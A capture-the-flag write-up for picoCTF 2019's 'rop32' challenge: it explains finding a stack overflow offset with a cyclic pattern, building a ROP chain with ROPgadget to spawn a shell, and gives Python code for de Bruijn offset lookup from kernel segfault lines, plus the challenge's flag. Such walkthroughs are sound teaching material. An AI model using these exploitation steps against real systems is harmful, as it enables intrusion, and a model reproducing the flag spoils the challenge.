# rop32

## Problem

> Can you exploit the following program to get a flag? You can find the program in /problems/rop32\_4\_0636b42072627d283f46d2427804b10c on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/rop32/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/rop32/vuln.c)

## Solution

1. Find the padding: run `python2 -c "from pwn import *; print cyclic(50)" | ./vuln`, then `dmesg | tail` to read the segfault address `0x61616168`; `cyclic_find(0x61616168)` returns 28, so the padding is `'a'*28`
2. Run `python ROPgadget.py --binary ./vuln --rop --badbytes "0a"` to generate the ROP chain (`--badbytes "0a"` excludes gadget addresses that contain a newline byte)
3. Paste the padding `'a'*28` into the generated chain
4. Run [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/rop32/script.py) for remote execution
5. Run `cat flag.txt` in the shell that spawns
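Step 1 in reusable form, as an added example that is not part of the original writeup or the picoCTF repository: the de Bruijn pattern and offset lookup that pwntools' `cyclic`/`cyclic_find` perform, plus a parser for the kernel's segfault line so a crash report maps straight to an overflow offset. The `dmesg` line is constructed; `max_len` is an assumed search bound.

```python
import itertools
import re
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield B(k, n): every length-n string over the alphabet occurs exactly
    once, so 4 bytes read out of a crash register map to a single offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)
    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` characters of the pattern (same text pwntools' cyclic() prints)."""
    return "".join(itertools.islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(value, n=4, max_len=65536):
    """Offset of `value` in the pattern, or -1; ints are packed little-endian (x86 stack order)."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    return cyclic(max_len, n).find(value)


# Constructed dmesg line, in the format of the x86 kernel's segfault report.
SAMPLE_DMESG = ("vuln[4242]: segfault at 61616168 ip 0000000061616168 "
                "sp 00000000ffffd3a0 error 14 in vuln[8048000+1000]")
SEGFAULT_RE = re.compile(r"segfault at [0-9a-f]+ ip ([0-9a-f]+)")


def fault_ip(dmesg_line):
    """Faulting instruction pointer from a kernel segfault line, or None."""
    m = SEGFAULT_RE.search(dmesg_line)
    return int(m.group(1), 16) if m else None


def padding_from_crash(dmesg_line):
    """Bytes of padding before the saved return address, or -1 if unmatched."""
    ip = fault_ip(dmesg_line)
    return cyclic_find(ip) if ip is not None else -1
```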

### Flag

`picoCTF{rOp_t0_b1n_sH_dee2e288}`
